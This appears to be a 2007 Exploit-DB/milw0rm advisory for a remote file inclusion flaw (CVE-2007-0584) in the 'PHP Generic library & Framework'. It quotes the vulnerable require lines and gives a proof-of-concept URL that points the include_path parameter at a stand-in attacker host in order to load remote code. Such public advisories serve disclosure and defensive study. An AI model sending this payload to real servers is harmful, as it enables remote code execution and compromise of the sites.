Lucene search
Mehmet InceEDB-ID:3217HistoryJan 28, 2007 - 12:00 a.m.
PHP Generic library & Framework - 'INCLUDE_PATH' Remote File Inclusion
2007-01-2800:00:00
Mehmet Ince
www.exploit-db.com
32
AI Score
7.4
Confidence
Low
-----------------------------------------------
PhP Generic library & framework (include_path) Remote File Include Exploit
-----------------------------------------------
Author: xoron
xoron.biz
-----------------------------------------------
Code:
require $GLOBALS[include_path]."configmember.php";
require $GLOBALS[include_path]."inc-membreManager.php";
-----------------------------------------------
POC:
www.[target].com/[script_pat]/membres/membreManager.php?include_path=http://evilscripts?
-----------------------------------------------
download: http://sourceforge.net/project/showfiles.php?group_id=72529
-----------------------------------------------
xoron gider izi kalir, selametle.
kaybetmenin tiryakisi bir รงoรงuk xoron.
-----------------------------------------------
# milw0rm.com [2007-01-28]Related
checkpoint_advisories
checkpoint_advisories
canvas
canvas
Immunity Canvas: GNERIC_INCLUDE
2007-01-30 17:28:00
nvd
nvd
CVE-2007-0584
2007-01-30 17:28:00
cve
cve
CVE-2007-0584
2007-01-30 17:28:00
prion
prion
Remote file inclusion
2007-01-30 17:28:00
cvelist
cvelist
CVE-2007-0584
2007-01-30 17:00:00
securityvulns
securityvulns